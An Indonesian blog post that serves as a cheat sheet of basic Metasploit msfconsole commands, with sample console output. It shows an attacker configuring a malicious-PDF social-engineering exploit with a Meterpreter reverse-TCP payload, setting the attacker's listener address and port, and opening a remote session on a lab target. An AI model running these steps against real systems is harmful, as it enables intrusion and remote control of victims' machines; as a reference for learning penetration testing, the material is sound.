Minggu, Agustus 20, 2017

 Perintah - Perintah dasar Metasploit (msfconsole)

 Perintah - Perintah dasar Metasploit (msfconsole)

Setelah sebelumnya saya share tentang Perintah - Perintah dasar Meterpreter sekarang saya akan bagikan Perintah - Perintah dasar Metasploit (msfconsole). kebalik ya hehe, harusnya msfconsole dulu baru meterpreter, tapi gpp deh yang penting tetep sharing :D.

Oke, di bawah ini merupakan beberapa perintah dari msfconsole yang dapat digunakan

msfconsole
Perintah untuk memulai menjalankan msfconsole

banner

Perintah ini digunakan untuk memilih secara acak logo metasploit yang akan di tampilkan

msf > banner MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM http://metasploit.pro Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro Learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >

db_status
Perintah ini digunakan untuk mengecek koneksi database postgresql

msf > db_status [*] postgresql connected to msf msf >

show exploit
Perintah ini digunakan untuk melihat semua exploit yang ada di metasploit

msf > show exploits Exploits ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

show payloads
Perintah ini digunakan untuk melihat semua payload yang ada

msf > show payloads Payloads ======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline aix/ppc/shell_interact normal AIX execve Shell for inetd aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline

show auxiliary
Perintah ini digunakan untuk menampilkan semua module auxiliary

msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ---- --------------- ---- ----------- admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO admin/appletv/appletv_display_image normal Apple TV Image Remote Control admin/appletv/appletv_display_video normal Apple TV Video Remote Control

search name
Perintah ini digunakan untuk mencari sebuah exploit atau module yang disebutkan

msf > search pdf_embedded Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent Adobe PDF Embedded EXE Social Engineering exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent Adobe PDF Escape EXE Social Engineering (No JavaScript) msf >

use
Perintah ini digunakan untuk menentukan module exploit yang akan digunakan

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) >

set payload

Perintah ini untuk menentukan payload yang akan digunakan

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) >

show targets
Perintah ini digunakan untuk melihat platform target yang dapat diserang dengan exploit yang digunakan

msf exploit(adobe_pdf_embedded_exe) > show targets Exploit targets: Id Name -- ---- 0 Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English) msf exploit(adobe_pdf_embedded_exe) >

show options

Perintah ini digunakan melihat pilihan yang tersedia untuk module atau exploit

msf exploit(adobe_pdf_embedded_exe_nojs) > show options Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs): Name Current Setting Required Description ---- --------------- -------- ----------- EXENAME msf.exe no The Name of payload exe. FILENAME evil.pdf no The output filename. LAUNCH_MESSAGE To view the encrypted content please tick the "Do not show this message again" box and press Open. no The message to display in the File: area Exploit target: Id Name -- ---- 0 Adobe Reader <= v9.3.3 (Windows XP SP3 English) msf exploit(adobe_pdf_embedded_exe_nojs) >

back
Perintah ini digunakan untuk kembali dari konteks saat ini

msf exploit(adobe_pdf_embedded_exe) > back msf >

set LHOST

Perintah ini digunakan untuk mengatur IP Attacker, bisa menggunakan IP Lokal atau IP Publik (tergantung kondisi )

msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.100 lhost => 192.168.1.100 msf exploit(adobe_pdf_embedded_exe) >

set LPORT

Perintah ini digunakan untuk mengatur port lintener

msf exploit(adobe_pdf_embedded_exe) > set LPORT 443 LPORT => 443 msf exploit(adobe_pdf_embedded_exe) >

set RHOST
Perintah ini digunakan untuk menentukan IP Target, (biasa digunakan untuk jenis exploit tertentu)

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.103 RHOST => 192.168.1.103

unset

Kebalikan dari set perintah ini digunakan untuk membatalkan atau menghapus parameter yang sebelumnya di atur, kita juga dapat menghapus semua variabel dengan perintah 'unset all'

msf exploit(handler) > unset payload android/meterpreter/reverse_tcp Unsetting payload... Unsetting android/meterpreter/reverse_tcp... msf exploit(handler) > unset all Flushing datastore... msf exploit(handler) >

save
Kita juga dapat menyimpan semua setting yang telah di tetapkan,dan semua akan dimuat ketika startup(saat msfconsole di buka) tanpa mengetur semuanya lagi dari awal.
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.100 lhost => 192.168.1.100 msf exploit(handler) > set lport 443 lport => 443 msf exploit(handler) > save Saved configuration to: /root/.msf4/config msf exploit(handler) > exploit
Perintah ini digunakan mengeksekusi module exploit dan menyerang target

msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.100:443 [*] Starting the payload handler...

exploit -j

Perintah ini digunakan mengeksekusi module exploit dan menyerang target sekaligus bejalan sebagai background

msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.100:443 [*] Starting the payload handler... msf exploit(handler) >

exploit -z

Hampir sama dengan exploit -j, ini tidak berinteraksi dengan sesi meterpreter ketika exploitasi suskses(otomatis bejalan sebagai background jika exploitasi sukses)

msf exploit(handler) > exploit -z [*] Started reverse handler on 192.168.1.100:443 [*] Starting the payload handler... [*] Sending stage (885806 bytes) to 192.168.1.103 [*] Meterpreter session 2 opened (192.168.1.100:443 -> 192.168.1.103:49272) at 2016-03-02 00:26:39 +0700 [*] Session 1 created in the background. msf exploit(handler) >

sessions -l

Perintah ini digunakan untuk melihat list sesi meterpreter yang sedang aktif (berjalan sebagai background)

msf exploit(handler) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 2 meterpreter x86/win32 SAMSUNG\SAMSUNG @ SAMSUNG 192.168.1.100:443 -> 192.168.1.103:49207 (192.168.1.103) msf exploit(handler) >

sessions -i ID

Perintah ini digunakan untuk berinteraksi kembali dengan sesi meterpreter yang sedang berjalan sebagai background

msf exploit(handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter >

sessions -K

Perintah ini digunakan untuk mematikan semua sesi meterpreter yang sedang aktif

msf exploit(handler) > sessions -K [*] Killing all sessions... [*] 192.168.1.103 - Meterpreter session 2 closed. msf exploit(handler) >

help
Perintah ini digunakan untuk melihat perintah-perintah dan deskripsi yang dapat digunakan pada msfconsole

msf > help Core Commands ============= Command Description ------- ----------- ? Help menu back Move back from the current context banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host edit Edit the current module with $VISUAL or $EDITOR exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable go_pro Launch Metasploit web GUI grep Grep the output of another command help Help menu

Itulah beberapa contoh Perintah - Perintah dasar dari msfconsole, mohon maaf apabila ada bebrapa perintah yang masih kurang. semoga bermanfaat.

sumber https://www.offensive-security.com
....
...